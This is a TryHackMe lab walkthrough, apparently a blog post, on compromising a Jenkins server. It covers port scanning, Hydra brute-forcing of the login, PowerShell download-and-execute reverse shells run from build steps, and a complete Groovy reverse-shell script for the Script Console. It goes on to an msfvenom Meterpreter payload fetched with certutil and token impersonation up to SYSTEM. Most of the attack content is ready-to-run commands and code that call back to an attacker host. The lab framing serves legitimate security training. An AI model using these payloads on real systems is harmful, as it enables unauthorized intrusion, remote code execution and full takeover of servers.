Exploiting Jenkins | Advanced Exploitation | TryHackMe

Iam_Wander
6 min read · Jul 13, 2023


In this room, we learn how to exploit Jenkins, gain initial access as a user, and then escalate our privileges by exploiting a common misconfiguration on this widely used automation server. (Jenkins is used to build continuous integration/continuous delivery pipelines that automatically build and deploy developers' code whenever they change it.)

Gaining Initial Access

In this section, I will show how to gain initial access to the Jenkins server: first by guessing the login, then by brute-forcing it with Burp Suite and Hydra.

To start, we use Nmap to survey the open ports, their services and versions, and any other interesting information the default scripts return (the SYN scan needs root).

$ nmap -sV -sC -sS -T4 -Pn 10.10.136.50

From our Nmap scan we find three open ports, two of which look interesting: port 80 running an HTTP server and port 8080 running an HTTP server (Jetty). A closer look at both shows that http://10.10.136.50:8080 is the login page of the Jenkins administration panel.

We could brute-force the password to get past the login page, but before doing so we try commonly used credentials such as user:user, admin:admin and admin:Pa$$word. If none of those work, we look up the default or documented logins for the product, and only then brute-force. In Jenkins' case this is an easy pass, as admin:admin went through. For the sake of learning, I am going to demonstrate the brute-force route with Burp Suite and Hydra as well.

Bruteforce for logins with Burp Suite and Hydra

Both Burp Suite and Hydra are powerful tools whose usefulness should not be underestimated. Let's begin.

Start Burp's intercept, visit the Jenkins address in Firefox (proxied through Burp) and forward the GET request.

Once the page loads, enter any credentials on the login page; in my case I used test:test, as shown below.

With the failed login captured, find the POST request in Proxy > HTTP history and send it to Intruder, where we set the payload positions and attack type.

We cleared the default positions and added a single one on the password value, which is the field we want to brute-force. I selected the Pitchfork attack type (with only one position it behaves like Sniper; Pitchfork pays off when you pair a username list with a password list).
Take note of the highlighted fields, the login path and the form parameter names, as Hydra needs them.

On your terminal, run the command below. The path, parameter names and failure string all come from the POST captured in Burp: Jenkins posts the form to /j_acegi_security_check with j_username and j_password, and answers a bad login with a redirect to /loginError, which is what the last field tells Hydra to treat as a failed attempt.

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.136.50 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F:loginError"

As expected, the password for the username admin is admin.

Get a Reverse Shell

Now that we are logged into the admin panel, let's find a feature of the tool that lets us execute commands on the underlying system, and run it. Jenkins offers this legitimately: a project's Build section has an “Execute Windows batch command” build step (“Execute shell” on Linux), so anyone who can configure a job can run commands as the Jenkins service account.

I will demonstrate three ways to get a shell.

Using PowerShell Reverse TCP

These commands are particularly lengthy and memorising them is of no use, so go to your browser and search for “powershell iex reverse shell”. You should get plenty of results; I normally visit https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

First we need the PowerShell reverse TCP script in our working folder (you could paste the code into a file with nano, or download the script from GitHub). Save it as powershell_reverse_tcp.ps1:

wget https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1 -O powershell_reverse_tcp.ps1

When the script has been downloaded, examine the code and replace the address and port given there with our local IP address (the Kali IP) and the port we will listen on. Save the file, then start the Python web server and a netcat listener on that port.

$ python3 -m http.server 80

Set your LHOST and LPORT as shown.

Time to run the script from your Jenkins panel. Because the listener address and port were edited into the script, downloading and evaluating it is all that is needed; the script connects back on its own:

powershell IEX (New-Object Net.WebClient).DownloadString('http://<kali ip>/powershell_reverse_tcp.ps1')

We got a connection.

Bingo! We got a connection, and now we can easily get the user flag.

user.txt

Get shell with Invoke-PowerShellTcp (Nishang)

We need the Nishang PowerShell script in our current working directory; we can download it with the command below:

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Now run the command below from the Jenkins build step (it is a Windows command line, so it launches powershell.exe). Make sure your LHOST and LPORT are correct, and that your netcat listener and web server are running:

powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.1.3/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -Port 4444

There you have your initial access.

Exploiting with Groovy Scripts

Under Manage Jenkins we find an interesting entry called “Script Console”. Here we can run Groovy scripts, which execute inside the Jenkins JVM under the Jenkins service account, so we can get a shell in a heartbeat.

Search your browser for a Groovy reverse shell to use.

Enter your LHOST and LPORT in the script, run it in the console and catch the reverse shell on your listener. Note: you won't need the Python web server in this case, because the script runs inside Jenkins itself and nothing has to be downloaded.

You got your reverse shell
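For reference, here is the kind of script that search turns up, as an added example rather than code from the original post (it follows the widely shared Java-socket Groovy reverse shell). The listener address 10.10.14.2 and port 4444 are placeholders for your own LHOST/LPORT; it assumes a listener such as nc -lvnp 4444 is already waiting and that the Jenkins host can reach it. It also goes slightly beyond the room by choosing cmd.exe or /bin/sh from os.name, so the same paste works whether Jenkins runs on Windows or Linux:

```groovy
// Added example (not from the TryHackMe room or the original post): a Groovy
// reverse shell for the Jenkins Script Console (Manage Jenkins > Script Console).
// Assumptions: host/port below are the attacker's listener (e.g. `nc -lvnp 4444`
// on the Kali box) and the Jenkins service account has outbound TCP to it.
String host = "10.10.14.2"   // assumed attacker IP (LHOST); change to yours
int port = 4444              // assumed listener port (LPORT)

// Pick the shell binary for the OS Jenkins runs on; the room's target is Windows.
boolean windows = System.getProperty("os.name").toLowerCase().contains("windows")
String cmd = windows ? "cmd.exe" : "/bin/sh"

// Start the shell with stderr merged into stdout, then connect back to the listener.
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start()
Socket s = new Socket(host, port)
InputStream pi = p.getInputStream()
InputStream pe = p.getErrorStream()
InputStream si = s.getInputStream()
OutputStream po = p.getOutputStream()
OutputStream so = s.getOutputStream()

// Pump bytes between the socket and the process until either side goes away.
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read())   // shell output -> attacker
    while (pe.available() > 0) so.write(pe.read())   // (empty: stderr is merged)
    while (si.available() > 0) po.write(si.read())   // attacker input -> shell
    so.flush()
    po.flush()
    Thread.sleep(50)
    try { p.exitValue(); break } catch (Exception e) { }  // shell exited
}
p.destroy()
s.close()
```

Paste it into Manage Jenkins > Script Console and click Run. The browser request stays pending while the shell is alive, because the script blocks the console request until the socket closes, and the shell runs as whatever account the Jenkins service uses, which is the same user you get through the build-step approach.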

Spawn a Meterpreter Shell

From here, it only gets interesting.

Start Metasploit, then generate a payload with msfvenom on the Kali machine:

msfconsole
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<kali ip> LPORT=<port> -f exe -o shell-name.exe

Once we have our payload, we need to transfer it to the Windows machine with the certutil tool. First start your web server on the Kali machine, then run the command below in your Windows shell:

certutil -urlcache -f http://<kali ip>:<port>/shell-name.exe shell-name.exe

Now that our payload is on the Windows box we can configure Metasploit: use exploit/multi/handler, set the payload to windows/meterpreter/reverse_tcp, set LHOST and LPORT to the same values given to msfvenom, and run the exploit so the handler is listening.

To trigger the payload we run Start-Process shell-name.exe from our Windows PowerShell shell (start shell-name.exe does the same from a cmd shell).

Bingo! We get our Meterpreter session. Time to escalate our privileges.

A quick look at getuid shows we are still a normal user.

Privilege Escalation

The end goal is always to gain administrator privileges. To do so we need to migrate to a suitable process; in my case I love migrating to the spooler service (spoolsv.exe) as it is a much more stable process.

Let's load Incognito and list the tokens we can impersonate:

>load incognito
>list_tokens -u

We get lots of tokens, but we are only interested in one, “BUILTIN\Administrators”. This looks like something worth impersonating, so we run impersonate_token "BUILTIN\Administrators". Keep in mind that an impersonated token applies to the Meterpreter thread rather than the process's primary token, which is why migrating into a process that already runs as SYSTEM, such as spoolsv.exe, matters when you want to use those privileges fully.

Once this is done, getuid reports NT AUTHORITY\SYSTEM.

We have the administrator flag.

We are in as Administrator and can look through its files however we want.

Thank you for taking the time to read this walkthrough; we have compromised this machine using Metasploit. I will be writing another walkthrough demonstrating how to compromise the same machine manually.

Happy Hacking! Cheers.
